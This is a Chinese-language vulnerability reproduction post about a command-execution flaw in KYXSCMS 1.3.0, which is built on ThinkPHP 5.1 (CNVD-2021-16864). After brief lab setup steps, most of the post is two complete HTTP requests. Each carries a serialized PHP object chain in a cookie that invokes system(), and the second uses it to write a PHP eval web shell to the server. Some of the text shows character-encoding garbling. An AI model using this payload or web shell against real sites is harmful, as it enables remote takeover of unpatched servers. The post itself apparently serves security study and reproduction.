kycms1.3.0命令执行利用
kyxscms框架命令執(zhí)行
kyxscms框架命令執(zhí)行(CNVD-2021-16864)
KYXSCMS提供一個輕量級小說網(wǎng)站解決方案,基于ThinkPHP5.1+MySQL的技術(shù)開發(fā)。
KYXSCMS,靈活,方便,人性化設(shè)計(jì)簡單易用是最大的特色,是快速架設(shè)小說類網(wǎng)站首選,只需5分鐘即可建立一個海量小說的行業(yè)網(wǎng)站,批量采集目標(biāo)網(wǎng)站數(shù)據(jù)或使用數(shù)據(jù)聯(lián)盟,即可自動采集獲取大量數(shù)據(jù)。內(nèi)置標(biāo)簽?zāi)0?#xff0c;即使不懂代碼的前端開發(fā)者也可以快速建立一個漂亮的小說網(wǎng)站。
漏洞環(huán)境
安裝phpstudy
然后下載kyxscms1.3.0的源碼
http://bbs.kyxscms.com/?t/1.html%E3%80%82
根目錄設(shè)置為源碼的存放位
然后在網(wǎng)站管理面添加偽靜態(tài)
然后就可以打開網(wǎng)站,出現(xiàn)安裝向?qū)Т沓晒?/p>
影響版本
kyxscms=< 1.3.0
thinkphp=<5.1.33
漏洞復(fù)現(xiàn)
我們根據(jù)向?qū)乱徊?#xff0c;在數(shù)據(jù)庫設(shè)置的時候密碼為phpshtudy里數(shù)據(jù)庫的密碼.
數(shù)據(jù)庫生成后進(jìn)入前臺即可,
首先我們注冊賬號,然后登陸進(jìn)去抓包,poc為下
GET /user/recentread HTTP/1.1 Host: kyxscms:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=4enrahv5gfh6gp0rkco864bh6j; lf___forward__=%2Fapi%2Fcrontab%2Findex; lf_user_auth=think%3A%7B%22uid%22%3A%221%22%2C%22username%22%3A%22blank%22%7D; lf_user_auth_sign=e93ece5c38646339207bed9799c931170e9959ff;lf_read_log=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A命令語句的長度%3A%22命令執(zhí)行語句%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0命令執(zhí)行成功
寫入shell
GET /user/index/index.html HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: Phpstorm-11743061=7c75807e-0da5-4430-8229-b17234f7ff48; Webstorm-f8f6f435=146833d1-7a32-4b5f-b3ec-2e51c5287eb1; lf___forward__=%2F; lf_user_auth=think%3A%7B%22uid%22%3A%221%22%2C%22username%22%3A%22blank%22%7D; lf_user_auth_sign=e93ece5c38646339207bed9799c931170e9959ff;lf_read_log=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A42%3A%22echo+%22%3C%3Fphp+%40eval%28%24_POST%5Bedi%5D%29%3B%3F%3E%22%3Eedi.php%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D Upgrade-Insecure-Requests: 1上傳利用成功
文章中的源碼也可以關(guān)注我們獲取,想要學(xué)習(xí)要學(xué)習(xí)更多的安全知識可以關(guān)注EDI安全公眾號,師傅們我們一起學(xué)習(xí)更多滲透技巧
總結(jié)
以上是生活随笔為你收集整理的kycms1.3.0命令执行利用的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 工作217:重置逻辑
- 下一篇: 电子科大《模拟集成电路分析与设计》(罗萍